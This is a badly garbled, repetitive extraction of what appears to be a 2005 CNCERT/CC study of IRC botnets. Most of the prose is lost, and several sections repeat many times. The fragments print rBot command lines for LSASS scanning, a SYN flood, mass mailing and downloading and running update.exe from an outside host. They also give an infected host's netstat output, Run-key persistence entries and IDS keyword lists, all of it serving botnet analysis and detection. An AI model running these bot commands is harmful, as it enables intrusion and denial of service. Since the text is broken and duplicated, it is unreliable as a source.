mm mass mail httpwww recptcom
fetchphp php
httpwwwmailnetemailhtml
ip spammer
2 socks v4v5 Open Relay
Spammer Open Proxy Open Mail Relay
Open Relay Server Open Mail Relay Spammer
Spammer Proxy Open Relay Proxy
Open Relay Spammer Proxy Open Relay
Spammer
socks v4 Smtp Open Relay
socks v4 Open Relay
IP ISP IP
3
email AgoBot
harvestemails
4 (Spyware)
Spyware Keylogger
-gtPRIVMSG rBot Download httpwwwelitecodersnetupdateexe crBotexe 1
httpwwwelitecodersnet updateexe crBotexe 1
Windows Bot
Bot bot
PINGPONG bot
IRC TCP 6667 CNCERTCC
bot bot
cmdexe plusmnnetst at an IP
IP
135 445
fportexe netstat
11
bot
CD-Key
bot
bot ie
ie bot rootkit [2]
bot rootkit
rootkit bot
CNCERTCC
1 honeypot bot
2) IDS
3
IRC
1 Honeypot
bot bot Honeywall
bot dnsip
windows 25 [11]
bot bot
[3] honeynet project 2004 11
2005 3 1 HoneyWall 1 mwcollect[8]
180
30 5500 800 2004
11 2005 1 406 Ddos 179 [4]
2
IRC IDS IRC Bot JOIN PASS
PRIVMSG NICK TOPIC NOTICE
IRC TCP
udp syn ddos http download exe update scan exploit login
logon advscan lsass dcom beagle dameware
3
1 bot(fast joining bots)
bots IRC
IRC
2) bot(Long standing connection)
bots
3) bot(not talkative)
Bots bot pingpong
DdoSVax [5] Bot
4
1
IDS bot
bot bot
bot bot
IDS IRC
2
IDS IRC
Bot IRC IRC RFC IDS
bot
IRC IRC
3
IDS
bot
IDS
socks v4
Server plusmnTOPI rBot advscan lsass 200 5 0 -r s
a
-gtTOPIC rBot advscan lsass 200 5 0 -r sn
b
-gtTOPIC rBot advscan lsass 200 5 0 -r sn
c) Botnet bot
lt-ControllerNICKControllerUSERsocks(HOST or IP) TOPIC rBot advscan lsass
200 5 0 -r srn
IDS bot
IP IP IP IP
IDS 3 1 3
1 3 1
1 IDS
IRC
1
IP port ( )
2
channel ( )
3 Host
login pass
host bot
4 Bot
login update download uninstall
Botnet
1
bot
1
bot
bot
bot
2
bot
bot bot
bot
2
IP
bot
3 bot
2005 CNCERTCC
Bot
1 IRC
IRC bot
bot bot
IRC
Serv1 Serv2 shy Ser v N
IRC Serv1 Serv1 IP Serv2
Serv3 Serv2 Nick_Serv1
Serv2 Serv1 IRC ServX Nick_Serv3
Nick_Serv6 Serv3 Serv6 ServX
2 TOPIC
TOPIC IRC
bot TOPIC
TOPIC 1)advscan lsass 200 5 0 -r s
LSASS 200 5 -r = random
-s = silent
2)httpupdate httpserverrBotexe crBotexe 1
server rBotexe c 1
CNCERTCC TOPIC Bot
TOPIC degJ OI N ne wchanne
TOPIC PRIVMSG
bot bot bot TOPIC
TOPIC IP IP
IP
3
bot
bot
Bot
login logon auth
bot bot nick
host rBot v065
1
-gtPRIVMSG rbot login password sn
IP
2 bot
lt-ControllerNICKControllerUSERhost PRIVMSG rbot login password -srn
1 2
IP Bot
host
IP
lt-ControllerNICKControllerUSER10101010 PRIVMSG rbot login password -srn
10101010 login
3 rBot NICK
ControllerNICK USER(ControllerUSER) host (login) (password
-s) rBot
user host rBot
host net com net
com rBot host com net
()
4 -s silent bot
-gtPRIVMSG rbot password acceptedn
bot
Windows Windows
bot 90
[7]
Windows XP
11
Bot
Symantec 2004 1 6 Bot
2000 30000 [15] MessageLabs 2004
70 [10] CipherTrust 2005 4 5
15 17 20-15
Bot [12]
IRC Agobot
PhatBot P2P
IRC P2P
2005 rootkit bot(rBot )
rootkit bot bot
2004
CNCERTCC Bot
IRC
P2P P2P bot
Phatbot[13] sinit[14]
Phatbot Gnutella Guutella cache servers server peer
peer TCP 4387 Gnutella Phatbot
waste waste Phatbot waste
md5
Phatbot
sinit P2P Peer
dll dll sinit
bot
CNCERTCC bot
httpgoa-irccoukwostenrbotexe 2005 7 9 9 rbotexe
IP 10001
sniffer
cmdexe
cgtnetstat anrn
TCP 0000135 00000 LISTENING
TCP 0000445 00000 LISTENING
TCP 100011150 203151217856667 ESTABLISHED
TCP 100011616 20210832137445 FIN_WAIT_1
TCP 100011631 20210832147445 FIN_WAIT_1
TCP 100011714 20210832190445 FIN_WAIT_1
TCP 100011727 20210832165445 FIN_WAIT_1
TCP 100012253 20210834211445 TIME_WAIT
TCP 100012904 2021083791445 TIME_WAIT
TCP 100013476 20210839151445 TIME_WAIT
TCP 100013478 20210839153445 TIME_WAIT
TCP 100013480 20210839155445 TIME_WAIT
TCP 100013486 20210839151445 TIME_WAIT
TCP 100013487 20210839153445 TIME_WAIT
TCP 100013488 20210839155445 TIME_WAIT
TCP 100013673 2021084082445 TIME_WAIT
TCP 100013674 2021084082445 TIME_WAIT
TCP 100014953 2021084520445 TIME_WAIT
TCP 100014955 2021084520445 TIME_WAIT
TCP 100014959 2021084523445 TIME_WAIT
TCP 100014961 2021084523445 TIME_WAIT
UDP 000069 UDP 69
UDP 0000445
UDP 10001137
UDP 10001138
fportexe
C gtfport | find 1150 1150 6667
1048 wininit -gt 1150 TCP CWINNTsystem32wininitexe
Cgtfport | find 69
1048 wininit -gt 69 UDP CWINNTsystem32wininitexe
6667 69 wininitexe rBot
wininitexe sysinternals FileMon
bot sysinternals autoruns
rBot
HKLMSoftwareMicrosoftWindowsCurrentVersionRunMicrosoft Update 32 wininitexe
HKLMSoftwareMicrosoftWindowsCurrentVersionRunServicesMicrosoft Update 32 wininitexe
Wininit 445 6667
IP
20315121785 6667
TCP
Wininit IRC
-gtNICK CHN|9148119rnUSER autdeoxsnv 0 0 CHN|9148119rn ( )
-gtJOIN xdcc dropitrn ( xdcc dropit)
lt- CHN|9148119 autdeoxsnv 10001 332 CHN|9148119 xdcc advscan asn1smb 100 5 0 b (
advscan asn1smb )
-gtPRIVMSG xdcc [SCAN] Sequential Port Scan Started On 10000445 within a delay of 5 seconds for 0
min using 100 threadsrn( )
CNCERTCC 2005
[1]
20054
[2] Malicious Bots Hide Using Rootkit Code By Paul F Roberts May 17 2005
httpwwweweekcomarticle201759181697200asp
[3] honeynet project plusmn Kno w your ene my
Tracking Botnet
[4] Botnet Tracking Exploring a Root-Cause Methodology to Prevent Distributed Denial-of-Service Attacks
Felix C Freiling and Thorsten Holz and Georg Wicherski httpwwwhoneynetorgpapersindividual
[5] Detecting Bots in Internet Relay Chat Systems Jonas Bolliger Thomas Kaufmann
wwwtikeeethzch~ddosvaxsadasa-2004-29taskpdf
[6] Know your EnemyPhishing httpwwwhoneynetorg 16th May 2005
[7] Shield First-Line Worm Defense Helen J Wang Chuanxiong Daniel R Simon and Alf Zugenmaier
Microsoft Research ACM SIGCOMM 2004
[8] httpwwwmwcollectorg
[9] httpwwwcertorg
[10] httpwwwmessagelabcouk
[11] Joe Stewart deg E mer gi ng Threats Fr o m Discover y t o Pr ot ecti o
wwwsdissaorgdownloadsemergingthreats-publicpdf
[12] httpwwwciphertrustcomresourcesstatisticszombiephp
[13] Lurhq Threat Intelligence Group Phatbot Trojan Analysis httpwwwlurhqcomphatbothtml
[14] Lurhq Threat Intelligence Group
Sinit P2P Trojan Analysis httpwwwlurhqcomsinithtml
[15] httpwwwsymanteccompressindex_2004html
[16] Tom Vogt Simulating and optimising worm propagation algorithms
wwwsecurityfocuscomguest24046 20039
This document was created with Win2PDF available at httpwwwdaneprairiecomThe unregistered version of Win2PDF is for evaluation or non-commercial use only
Bot
Bot
IRC
AOL Bot IRC Bot AOL AIM-Canbot
Fizzer AOL Instant Messager Bot
P2P Bot Bot
phatbot P2P
Bot 90 Unix Bot 1993
Eggdrop Bot Bot IRC
Bot Bot Bot
Bot Bot IRC Bot Bot Bot 036hotmailcom
MSN Bot
1999
11 SubSeven 21 IRC
IRC Bot IRC Bot
Bot IRC Bot Bot
Windows Spam DDos Bot
Bot (Worm) Bot
Bot 2003 Deloader Bot
Bot Bot
Bot
Bot
Trojan Horse Bot
IP Bot
IRC DCC
Bot
Spyware
2
Bot
trojan horse
worm
Spyware
virus
2
1
2001
[16]
Botnet
2004 3 19
Witty Witty 10
110 20 50
2
DDoS DDoS
DDoS
DDoS
DDoS DDoS
3
IP CERT MessageLab [9][10] DDoS
4
5
6
socks
IRC IRC Bot
1 IRC Internet Relay Chat
IRC RFC1459 IRC Channel
IRC
IRC IRC IRC
irc263net IP IP IRC Server
A IP1 B IP2 A B
IRC Server irc263net
IRC
IRC TCP 6667 6000 7000
IRC Bot 443 8000 500
IRC
2 IRC Bot
IRC Bot IRC IRC
HIRC mIRC 1 IRC Bot IRC
2 IRC Bot
IRC Bot IRC GT bot
IRC mIRC mIRC
mIRC mIRC GT bot
mIRC
IRC Bot IRC IRC Bot
IRC
1 NICK USER Bot IRC
2 PASS IRC PASS TCP
3 JOIN Channel key key
3) MODE IRC Bot
4) PING PONG IRC IRC
PING PONG PING
IRC IRC Bot
PINGPONG IRC Bot
5) PRIVMSG Channel msg Bot
6) DCC SEND Bot
3
(Bot) IRC
P2P
IRC DCC 1987
2004 CNCERTCC
1
DDos
-gtPRIVMSG rbot syn wwwxxxcom
80 200 3600n
rbot syn syn flood 200
wwwxxxcom 80 syn 3600 -gt bot CampC S
lt-
2
(Phishing)
DNS
host pharming
ISP
redirector
[6]
Phi s h i ng
3 (Spam)
Spammer
blacklist
1
-gtPRIVMSG rbot mm httpwww recptcomfetchphp httpwwwmailnetemailhtml
mm mass mail httpwww recptcom
fetchphp php
httpwwwmailnetemailhtml
ip spammer
2 socks v4v5 Open Relay
Spammer Open Proxy Open Mail Relay
Open Relay Server Open Mail Relay Spammer
Spammer Proxy Open Relay Proxy
Open Relay Spammer Proxy Open Relay
Spammer
socks v4 Smtp Open Relay
socks v4 Open Relay
IP ISP IP
3
email AgoBot
harvestemails
4 (Spyware)
Spyware Keylogger
-gtPRIVMSG rBot Download httpwwwelitecodersnetupdateexe crBotexe 1
httpwwwelitecodersnet updateexe crBotexe 1
Windows Bot
Bot bot
PINGPONG bot
IRC TCP 6667 CNCERTCC
bot bot
cmdexe plusmnnetst at an IP
IP
135 445
fportexe netstat
11
bot
CD-Key
bot
bot ie
ie bot rootkit [2]
bot rootkit
rootkit bot
CNCERTCC
1 honeypot bot
2) IDS
3
IRC
1 Honeypot
bot bot Honeywall
bot dnsip
windows 25 [11]
bot bot
[3] honeynet project 2004 11
2005 3 1 HoneyWall 1 mwcollect[8]
180
30 5500 800 2004
11 2005 1 406 Ddos 179 [4]
2
IRC IDS IRC Bot JOIN PASS
PRIVMSG NICK TOPIC NOTICE
IRC TCP
udp syn ddos http download exe update scan exploit login
logon advscan lsass dcom beagle dameware
3
1 bot(fast joining bots)
bots IRC
IRC
2) bot(Long standing connection)
bots
3) bot(not talkative)
Bots bot pingpong
DdoSVax [5] Bot
4
1
IDS bot
bot bot
bot bot
IDS IRC
2
IDS IRC
Bot IRC IRC RFC IDS
bot
IRC IRC
3
IDS
bot
IDS
socks v4
Server plusmnTOPI rBot advscan lsass 200 5 0 -r s
a
-gtTOPIC rBot advscan lsass 200 5 0 -r sn
b
-gtTOPIC rBot advscan lsass 200 5 0 -r sn
c) Botnet bot
lt-ControllerNICKControllerUSERsocks(HOST or IP) TOPIC rBot advscan lsass
200 5 0 -r srn
IDS bot
IP IP IP IP
IDS 3 1 3
1 3 1
1 IDS
IRC
1
IP port ( )
2
channel ( )
3 Host
login pass
host bot
4 Bot
login update download uninstall
Botnet
1
bot
1
bot
bot
bot
2
bot
bot bot
bot
2
IP
bot
3 bot
2005 CNCERTCC
Bot
1 IRC
IRC bot
bot bot
IRC
Serv1 Serv2 shy Ser v N
IRC Serv1 Serv1 IP Serv2
Serv3 Serv2 Nick_Serv1
Serv2 Serv1 IRC ServX Nick_Serv3
Nick_Serv6 Serv3 Serv6 ServX
2 TOPIC
TOPIC IRC
bot TOPIC
TOPIC 1)advscan lsass 200 5 0 -r s
LSASS 200 5 -r = random
-s = silent
2)httpupdate httpserverrBotexe crBotexe 1
server rBotexe c 1
CNCERTCC TOPIC Bot
TOPIC degJ OI N ne wchanne
TOPIC PRIVMSG
bot bot bot TOPIC
TOPIC IP IP
IP
3
bot
bot
Bot
login logon auth
bot bot nick
host rBot v065
1
-gtPRIVMSG rbot login password sn
IP
2 bot
lt-ControllerNICKControllerUSERhost PRIVMSG rbot login password -srn
1 2
IP Bot
host
IP
lt-ControllerNICKControllerUSER10101010 PRIVMSG rbot login password -srn
10101010 login
3 rBot NICK
ControllerNICK USER(ControllerUSER) host (login) (password
-s) rBot
user host rBot
host net com net
com rBot host com net
()
4 -s silent bot
-gtPRIVMSG rbot password acceptedn
bot
Windows Windows
bot 90
[7]
Windows XP
11
Bot
Symantec 2004 1 6 Bot
2000 30000 [15] MessageLabs 2004
70 [10] CipherTrust 2005 4 5
15 17 20-15
Bot [12]
IRC Agobot
PhatBot P2P
IRC P2P
2005 rootkit bot(rBot )
rootkit bot bot
2004
CNCERTCC Bot
IRC
P2P P2P bot
Phatbot[13] sinit[14]
Phatbot Gnutella Guutella cache servers server peer
peer TCP 4387 Gnutella Phatbot
waste waste Phatbot waste
md5
Phatbot
sinit P2P Peer
dll dll sinit
bot
CNCERTCC bot
httpgoa-irccoukwostenrbotexe 2005 7 9 9 rbotexe
IP 10001
sniffer
cmdexe
cgtnetstat anrn
TCP 0000135 00000 LISTENING
TCP 0000445 00000 LISTENING
TCP 100011150 203151217856667 ESTABLISHED
TCP 100011616 20210832137445 FIN_WAIT_1
TCP 100011631 20210832147445 FIN_WAIT_1
TCP 100011714 20210832190445 FIN_WAIT_1
TCP 100011727 20210832165445 FIN_WAIT_1
TCP 100012253 20210834211445 TIME_WAIT
TCP 100012904 2021083791445 TIME_WAIT
TCP 100013476 20210839151445 TIME_WAIT
TCP 100013478 20210839153445 TIME_WAIT
TCP 100013480 20210839155445 TIME_WAIT
TCP 100013486 20210839151445 TIME_WAIT
TCP 100013487 20210839153445 TIME_WAIT
TCP 100013488 20210839155445 TIME_WAIT
TCP 100013673 2021084082445 TIME_WAIT
TCP 100013674 2021084082445 TIME_WAIT
TCP 100014953 2021084520445 TIME_WAIT
TCP 100014955 2021084520445 TIME_WAIT
TCP 100014959 2021084523445 TIME_WAIT
TCP 100014961 2021084523445 TIME_WAIT
UDP 000069 UDP 69
UDP 0000445
UDP 10001137
UDP 10001138
fportexe
C gtfport | find 1150 1150 6667
1048 wininit -gt 1150 TCP CWINNTsystem32wininitexe
Cgtfport | find 69
1048 wininit -gt 69 UDP CWINNTsystem32wininitexe
6667 69 wininitexe rBot
wininitexe sysinternals FileMon
bot sysinternals autoruns
rBot
HKLMSoftwareMicrosoftWindowsCurrentVersionRunMicrosoft Update 32 wininitexe
HKLMSoftwareMicrosoftWindowsCurrentVersionRunServicesMicrosoft Update 32 wininitexe
Wininit 445 6667
IP
20315121785 6667
TCP
Wininit IRC
-gtNICK CHN|9148119rnUSER autdeoxsnv 0 0 CHN|9148119rn ( )
-gtJOIN xdcc dropitrn ( xdcc dropit)
lt- CHN|9148119 autdeoxsnv 10001 332 CHN|9148119 xdcc advscan asn1smb 100 5 0 b (
advscan asn1smb )
-gtPRIVMSG xdcc [SCAN] Sequential Port Scan Started On 10000445 within a delay of 5 seconds for 0
min using 100 threadsrn( )
CNCERTCC 2005
[1]
20054
[2] Malicious Bots Hide Using Rootkit Code By Paul F Roberts May 17 2005
httpwwweweekcomarticle201759181697200asp
[3] honeynet project plusmn Kno w your ene my
Tracking Botnet
[4] Botnet Tracking Exploring a Root-Cause Methodology to Prevent Distributed Denial-of-Service Attacks
Felix C Freiling and Thorsten Holz and Georg Wicherski httpwwwhoneynetorgpapersindividual
[5] Detecting Bots in Internet Relay Chat Systems Jonas Bolliger Thomas Kaufmann
wwwtikeeethzch~ddosvaxsadasa-2004-29taskpdf
[6] Know your EnemyPhishing httpwwwhoneynetorg 16th May 2005
[7] Shield First-Line Worm Defense Helen J Wang Chuanxiong Daniel R Simon and Alf Zugenmaier
Microsoft Research ACM SIGCOMM 2004
[8] httpwwwmwcollectorg
[9] httpwwwcertorg
[10] httpwwwmessagelabcouk
[11] Joe Stewart deg E mer gi ng Threats Fr o m Discover y t o Pr ot ecti o
wwwsdissaorgdownloadsemergingthreats-publicpdf
[12] httpwwwciphertrustcomresourcesstatisticszombiephp
[13] Lurhq Threat Intelligence Group Phatbot Trojan Analysis httpwwwlurhqcomphatbothtml
[14] Lurhq Threat Intelligence Group
Sinit P2P Trojan Analysis httpwwwlurhqcomsinithtml
[15] httpwwwsymanteccompressindex_2004html
[16] Tom Vogt Simulating and optimising worm propagation algorithms
wwwsecurityfocuscomguest24046 20039
This document was created with Win2PDF available at httpwwwdaneprairiecomThe unregistered version of Win2PDF is for evaluation or non-commercial use only
Bot (Worm) Bot
Bot 2003 Deloader Bot
Bot Bot
Bot
Bot
Trojan Horse Bot
IP Bot
IRC DCC
Bot
Spyware
2
Bot
trojan horse
worm
Spyware
virus
2
1
2001
[16]
Botnet
2004 3 19
Witty Witty 10
110 20 50
2
DDoS DDoS
DDoS
DDoS
DDoS DDoS
3
IP CERT MessageLab [9][10] DDoS
4
5
6
socks
IRC IRC Bot
1 IRC Internet Relay Chat
IRC RFC1459 IRC Channel
IRC
IRC IRC IRC
irc263net IP IP IRC Server
A IP1 B IP2 A B
IRC Server irc263net
IRC
IRC TCP 6667 6000 7000
IRC Bot 443 8000 500
IRC
2 IRC Bot
IRC Bot IRC IRC
HIRC mIRC 1 IRC Bot IRC
2 IRC Bot
IRC Bot IRC GT bot
IRC mIRC mIRC
mIRC mIRC GT bot
mIRC
IRC Bot IRC IRC Bot
IRC
1 NICK USER Bot IRC
2 PASS IRC PASS TCP
3 JOIN Channel key key
3) MODE IRC Bot
4) PING PONG IRC IRC
PING PONG PING
IRC IRC Bot
PINGPONG IRC Bot
5) PRIVMSG Channel msg Bot
6) DCC SEND Bot
3
(Bot) IRC
P2P
IRC DCC 1987
2004 CNCERTCC
1
DDos
-gtPRIVMSG rbot syn wwwxxxcom
80 200 3600n
rbot syn syn flood 200
wwwxxxcom 80 syn 3600 -gt bot CampC S
lt-
2
(Phishing)
DNS
host pharming
ISP
redirector
[6]
Phi s h i ng
3 (Spam)
Spammer
blacklist
1
-gtPRIVMSG rbot mm httpwww recptcomfetchphp httpwwwmailnetemailhtml
mm mass mail httpwww recptcom
fetchphp php
httpwwwmailnetemailhtml
ip spammer
2 socks v4v5 Open Relay
Spammer Open Proxy Open Mail Relay
Open Relay Server Open Mail Relay Spammer
Spammer Proxy Open Relay Proxy
Open Relay Spammer Proxy Open Relay
Spammer
socks v4 Smtp Open Relay
socks v4 Open Relay
IP ISP IP
3
email AgoBot
harvestemails
4 (Spyware)
Spyware Keylogger
-gtPRIVMSG rBot Download httpwwwelitecodersnetupdateexe crBotexe 1
httpwwwelitecodersnet updateexe crBotexe 1
Windows Bot
Bot bot
PINGPONG bot
IRC TCP 6667 CNCERTCC
bot bot
cmdexe plusmnnetst at an IP
IP
135 445
fportexe netstat
11
bot
CD-Key
bot
bot ie
ie bot rootkit [2]
bot rootkit
rootkit bot
CNCERTCC
1 honeypot bot
2) IDS
3
IRC
1 Honeypot
bot bot Honeywall
bot dnsip
windows 25 [11]
bot bot
[3] honeynet project 2004 11
2005 3 1 HoneyWall 1 mwcollect[8]
180
30 5500 800 2004
11 2005 1 406 Ddos 179 [4]
2
IRC IDS IRC Bot JOIN PASS
PRIVMSG NICK TOPIC NOTICE
IRC TCP
udp syn ddos http download exe update scan exploit login
logon advscan lsass dcom beagle dameware
3
1 bot(fast joining bots)
bots IRC
IRC
2) bot(Long standing connection)
bots
3) bot(not talkative)
Bots bot pingpong
DdoSVax [5] Bot
4
1
IDS bot
bot bot
bot bot
IDS IRC
2
IDS IRC
Bot IRC IRC RFC IDS
bot
IRC IRC
3
IDS
bot
IDS
socks v4
Server plusmnTOPI rBot advscan lsass 200 5 0 -r s
a
-gtTOPIC rBot advscan lsass 200 5 0 -r sn
b
-gtTOPIC rBot advscan lsass 200 5 0 -r sn
c) Botnet bot
lt-ControllerNICKControllerUSERsocks(HOST or IP) TOPIC rBot advscan lsass
200 5 0 -r srn
IDS bot
IP IP IP IP
IDS 3 1 3
1 3 1
1 IDS
IRC
1
IP port ( )
2
channel ( )
3 Host
login pass
host bot
4 Bot
login update download uninstall
Botnet
1
bot
1
bot
bot
bot
2
bot
bot bot
bot
2
IP
bot
3 bot
2005 CNCERTCC
Bot
1 IRC
IRC bot
bot bot
IRC
Serv1 Serv2 shy Ser v N
IRC Serv1 Serv1 IP Serv2
Serv3 Serv2 Nick_Serv1
Serv2 Serv1 IRC ServX Nick_Serv3
Nick_Serv6 Serv3 Serv6 ServX
2 TOPIC
TOPIC IRC
bot TOPIC
TOPIC 1)advscan lsass 200 5 0 -r s
LSASS 200 5 -r = random
-s = silent
2)httpupdate httpserverrBotexe crBotexe 1
server rBotexe c 1
CNCERTCC TOPIC Bot
TOPIC degJ OI N ne wchanne
TOPIC PRIVMSG
bot bot bot TOPIC
TOPIC IP IP
IP
3
bot
bot
Bot
login logon auth
bot bot nick
host rBot v065
1
-gtPRIVMSG rbot login password sn
IP
2 bot
lt-ControllerNICKControllerUSERhost PRIVMSG rbot login password -srn
1 2
IP Bot
host
IP
lt-ControllerNICKControllerUSER10101010 PRIVMSG rbot login password -srn
10101010 login
3 rBot NICK
ControllerNICK USER(ControllerUSER) host (login) (password
-s) rBot
user host rBot
host net com net
com rBot host com net
()
4 -s silent bot
-gtPRIVMSG rbot password acceptedn
bot
Windows Windows
bot 90
[7]
Windows XP
11
Bot
Symantec 2004 1 6 Bot
2000 30000 [15] MessageLabs 2004
70 [10] CipherTrust 2005 4 5
15 17 20-15
Bot [12]
IRC Agobot
PhatBot P2P
IRC P2P
2005 rootkit bot(rBot )
rootkit bot bot
2004
CNCERTCC Bot
IRC
P2P P2P bot
Phatbot[13] sinit[14]
Phatbot Gnutella Guutella cache servers server peer
peer TCP 4387 Gnutella Phatbot
waste waste Phatbot waste
md5
Phatbot
sinit P2P Peer
dll dll sinit
bot
CNCERTCC bot
httpgoa-irccoukwostenrbotexe 2005 7 9 9 rbotexe
IP 10001
sniffer
cmdexe
cgtnetstat anrn
TCP 0000135 00000 LISTENING
TCP 0000445 00000 LISTENING
TCP 100011150 203151217856667 ESTABLISHED
TCP 100011616 20210832137445 FIN_WAIT_1
TCP 100011631 20210832147445 FIN_WAIT_1
TCP 100011714 20210832190445 FIN_WAIT_1
TCP 100011727 20210832165445 FIN_WAIT_1
TCP 100012253 20210834211445 TIME_WAIT
TCP 100012904 2021083791445 TIME_WAIT
TCP 100013476 20210839151445 TIME_WAIT
TCP 100013478 20210839153445 TIME_WAIT
TCP 100013480 20210839155445 TIME_WAIT
TCP 100013486 20210839151445 TIME_WAIT
TCP 100013487 20210839153445 TIME_WAIT
TCP 100013488 20210839155445 TIME_WAIT
TCP 100013673 2021084082445 TIME_WAIT
TCP 100013674 2021084082445 TIME_WAIT
TCP 100014953 2021084520445 TIME_WAIT
TCP 100014955 2021084520445 TIME_WAIT
TCP 100014959 2021084523445 TIME_WAIT
TCP 100014961 2021084523445 TIME_WAIT
UDP 000069 UDP 69
UDP 0000445
UDP 10001137
UDP 10001138
fportexe
C gtfport | find 1150 1150 6667
1048 wininit -gt 1150 TCP CWINNTsystem32wininitexe
Cgtfport | find 69
1048 wininit -gt 69 UDP CWINNTsystem32wininitexe
6667 69 wininitexe rBot
wininitexe sysinternals FileMon
bot sysinternals autoruns
rBot
HKLMSoftwareMicrosoftWindowsCurrentVersionRunMicrosoft Update 32 wininitexe
HKLMSoftwareMicrosoftWindowsCurrentVersionRunServicesMicrosoft Update 32 wininitexe
Wininit 445 6667
IP
20315121785 6667
TCP
Wininit IRC
-gtNICK CHN|9148119rnUSER autdeoxsnv 0 0 CHN|9148119rn ( )
-gtJOIN xdcc dropitrn ( xdcc dropit)
lt- CHN|9148119 autdeoxsnv 10001 332 CHN|9148119 xdcc advscan asn1smb 100 5 0 b (
advscan asn1smb )
-gtPRIVMSG xdcc [SCAN] Sequential Port Scan Started On 10000445 within a delay of 5 seconds for 0
min using 100 threadsrn( )
CNCERTCC 2005
[1]
20054
[2] Malicious Bots Hide Using Rootkit Code By Paul F Roberts May 17 2005
httpwwweweekcomarticle201759181697200asp
[3] honeynet project plusmn Kno w your ene my
Tracking Botnet
[4] Botnet Tracking Exploring a Root-Cause Methodology to Prevent Distributed Denial-of-Service Attacks
Felix C Freiling and Thorsten Holz and Georg Wicherski httpwwwhoneynetorgpapersindividual
[5] Detecting Bots in Internet Relay Chat Systems Jonas Bolliger Thomas Kaufmann
wwwtikeeethzch~ddosvaxsadasa-2004-29taskpdf
[6] Know your EnemyPhishing httpwwwhoneynetorg 16th May 2005
[7] Shield First-Line Worm Defense Helen J Wang Chuanxiong Daniel R Simon and Alf Zugenmaier
Microsoft Research ACM SIGCOMM 2004
[8] httpwwwmwcollectorg
[9] httpwwwcertorg
[10] httpwwwmessagelabcouk
[11] Joe Stewart deg E mer gi ng Threats Fr o m Discover y t o Pr ot ecti o
wwwsdissaorgdownloadsemergingthreats-publicpdf
[12] httpwwwciphertrustcomresourcesstatisticszombiephp
[13] Lurhq Threat Intelligence Group Phatbot Trojan Analysis httpwwwlurhqcomphatbothtml
[14] Lurhq Threat Intelligence Group
Sinit P2P Trojan Analysis httpwwwlurhqcomsinithtml
[15] httpwwwsymanteccompressindex_2004html
[16] Tom Vogt Simulating and optimising worm propagation algorithms
wwwsecurityfocuscomguest24046 20039
This document was created with Win2PDF available at httpwwwdaneprairiecomThe unregistered version of Win2PDF is for evaluation or non-commercial use only
IRC IRC Bot
1 IRC Internet Relay Chat
IRC RFC1459 IRC Channel
IRC
IRC IRC IRC
irc263net IP IP IRC Server
A IP1 B IP2 A B
IRC Server irc263net
IRC
IRC TCP 6667 6000 7000
IRC Bot 443 8000 500
IRC
2 IRC Bot
IRC Bot IRC IRC
HIRC mIRC 1 IRC Bot IRC
2 IRC Bot
IRC Bot IRC GT bot
IRC mIRC mIRC
mIRC mIRC GT bot
mIRC
IRC Bot IRC IRC Bot
IRC
1 NICK USER Bot IRC
2 PASS IRC PASS TCP
3 JOIN Channel key key
3) MODE IRC Bot
4) PING PONG IRC IRC
PING PONG PING
IRC IRC Bot
PINGPONG IRC Bot
5) PRIVMSG Channel msg Bot
6) DCC SEND Bot
3
(Bot) IRC
P2P
IRC DCC 1987
2004 CNCERTCC
1
DDos
-gtPRIVMSG rbot syn wwwxxxcom
80 200 3600n
rbot syn syn flood 200
wwwxxxcom 80 syn 3600 -gt bot CampC S
lt-
2
(Phishing)
DNS
host pharming
ISP
redirector
[6]
Phi s h i ng
3 (Spam)
Spammer
blacklist
1
-gtPRIVMSG rbot mm httpwww recptcomfetchphp httpwwwmailnetemailhtml
mm mass mail httpwww recptcom
fetchphp php
httpwwwmailnetemailhtml
ip spammer
2 socks v4v5 Open Relay
Spammer Open Proxy Open Mail Relay
Open Relay Server Open Mail Relay Spammer
Spammer Proxy Open Relay Proxy
Open Relay Spammer Proxy Open Relay
Spammer
socks v4 Smtp Open Relay
socks v4 Open Relay
IP ISP IP
3
email AgoBot
harvestemails
4 (Spyware)
Spyware Keylogger
-gtPRIVMSG rBot Download httpwwwelitecodersnetupdateexe crBotexe 1
httpwwwelitecodersnet updateexe crBotexe 1
Windows Bot
Bot bot
PINGPONG bot
IRC TCP 6667 CNCERTCC
bot bot
cmdexe plusmnnetst at an IP
IP
135 445
fportexe netstat
11
bot
CD-Key
bot
bot ie
ie bot rootkit [2]
bot rootkit
rootkit bot
CNCERTCC
1 honeypot bot
2) IDS
3
IRC
1 Honeypot
bot bot Honeywall
bot dnsip
windows 25 [11]
bot bot
[3] honeynet project 2004 11
2005 3 1 HoneyWall 1 mwcollect[8]
180
30 5500 800 2004
11 2005 1 406 Ddos 179 [4]
2
IRC IDS IRC Bot JOIN PASS
PRIVMSG NICK TOPIC NOTICE
IRC TCP
udp syn ddos http download exe update scan exploit login
logon advscan lsass dcom beagle dameware
3
1 bot(fast joining bots)
bots IRC
IRC
2) bot(Long standing connection)
bots
3) bot(not talkative)
Bots bot pingpong
DdoSVax [5] Bot
4
1
IDS bot
bot bot
bot bot
IDS IRC
2
IDS IRC
Bot IRC IRC RFC IDS
bot
IRC IRC
3
IDS
bot
IDS
socks v4
Server plusmnTOPI rBot advscan lsass 200 5 0 -r s
a
-gtTOPIC rBot advscan lsass 200 5 0 -r sn
b
-gtTOPIC rBot advscan lsass 200 5 0 -r sn
c) Botnet bot
lt-ControllerNICKControllerUSERsocks(HOST or IP) TOPIC rBot advscan lsass
200 5 0 -r srn
IDS bot
IP IP IP IP
IDS 3 1 3
1 3 1
1 IDS
IRC
1
IP port ( )
2
channel ( )
3 Host
login pass
host bot
4 Bot
login update download uninstall
Botnet
1
bot
1
bot
bot
bot
2
bot
bot bot
bot
2
IP
bot
3 bot
2005 CNCERTCC
Bot
1 IRC
IRC bot
bot bot
IRC
Serv1 Serv2 shy Ser v N
IRC Serv1 Serv1 IP Serv2
Serv3 Serv2 Nick_Serv1
Serv2 Serv1 IRC ServX Nick_Serv3
Nick_Serv6 Serv3 Serv6 ServX
2 TOPIC
TOPIC IRC
bot TOPIC
TOPIC 1)advscan lsass 200 5 0 -r s
LSASS 200 5 -r = random
-s = silent
2)httpupdate httpserverrBotexe crBotexe 1
server rBotexe c 1
CNCERTCC TOPIC Bot
TOPIC degJ OI N ne wchanne
TOPIC PRIVMSG
bot bot bot TOPIC
TOPIC IP IP
IP
3
bot
bot
Bot
login logon auth
bot bot nick
host rBot v065
1
-gtPRIVMSG rbot login password sn
IP
2 bot
lt-ControllerNICKControllerUSERhost PRIVMSG rbot login password -srn
1 2
IP Bot
host
IP
lt-ControllerNICKControllerUSER10101010 PRIVMSG rbot login password -srn
10101010 login
